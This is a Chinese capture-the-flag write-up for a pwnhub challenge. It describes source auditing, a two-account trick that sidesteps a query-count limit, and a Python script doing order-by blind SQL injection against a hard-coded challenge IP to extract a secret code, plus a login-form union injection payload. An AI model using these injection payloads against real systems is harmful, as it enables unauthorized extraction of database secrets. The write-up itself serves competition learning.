pwnhub会员日

太菜了错失5k

首先扫目录发现register.php,然后注册一下,发现profile.php?id=xx,然后id=2显示hintthisissource.php,下载源码,审计。
登录和注册处发现过滤了单引号和斜杠

1
if(strlen($username) < 3 or preg_match("|'|",$username) or preg_match("|\\\\|",$username))

然后在profile.php里发现,id只过滤了. ( ) _,然后可以子查询,id=0 union select 1,2,3,4,5,然后发现2字段可显,然后钻牛角尖注了一个晚上没弄出来。

后来再看一遍源码发现

1
2
3
4
5
6
7
8
CREATE TABLE `users` (
`id` int(5) NOT NULL AUTO_INCREMENT,
`user` varchar(20) DEFAULT NULL,
`pass` varchar(32) DEFAULT NULL,
`$secret` varchar(36) DEFAULT NULL,
`count` int(3) DEFAULT NULL,
PRIMARY KEY (`id`)
)

$secret在第4个字段,然后经过学长提醒可以用order by 注入,顿时想起以前的博文里有个知识点。
虽然有查询次数的限制

1
2
3
4
5
6
7
8
9
10
if($row['count'] == 140)
{

if(mysql_query("update users set $secret='{$duihuanma}' where user='$username';"))
{
mysql_query("update users set count=0 where user='$username';");
die("<center><br><h3>尝试次数过多,兑换码已经重置</h3></center>");
}
return $duihuanma;
}

但这里的username是session里的,可以注册两个号,一个大号一个小号,拿小号的session跑大号的id,这样小号的$secret会无限重置,但大号纹丝不动。
所以上脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests
import hashlib
import random

url = 'http://54.223.59.178/profile.php?id='
cookie = {'PHPSESSID':'03faiapvojtao8uhs323venhd4'}
string = '0123456789abcdefghijklmnopqrstuvwxyz{'

ch = 'apohnw4bjlyr62qicd5f18zexkt9vu7gm3'

for i in range(36):
for k in range(37):
payload = '29 union select 1,2,3,\''+ch+str(string[k])+'\',5 order by 4'
re = requests.get(url=url+payload,cookies=cookie)
#print(re.text)
if 'hammer' in re.text:
ch = ch + string[k-1]
print(ch)
break
if len(ch) == 36:
break


while 1:
s = ''.join(random.sample('qwertyuiopasdfghjklzxcvbnm1234567890',4))
if hashlib.md5(s.encode('utf_8')).hexdigest()[0:4] == 'ee3c':
print(s)
break

这个脚本不是很稳定,当跑崩的时候把最后一位删了重新跑就ok

EOF

其实还可以注password,一点过滤都没有

1
$sql = "select id,user from users where user = '$username' and pass = md5('$password')";

所以payload: username=ashdasohdia&password=1') union select d,1 from (select 1 as a,2 as b,3 as c,4 as d,5 as f from users where id = 0 union select * from users where id = 29) as a%23
username一定要xjb打,就是让它查不到
在302跳转的id里就有$secret
thisissourcecode.zip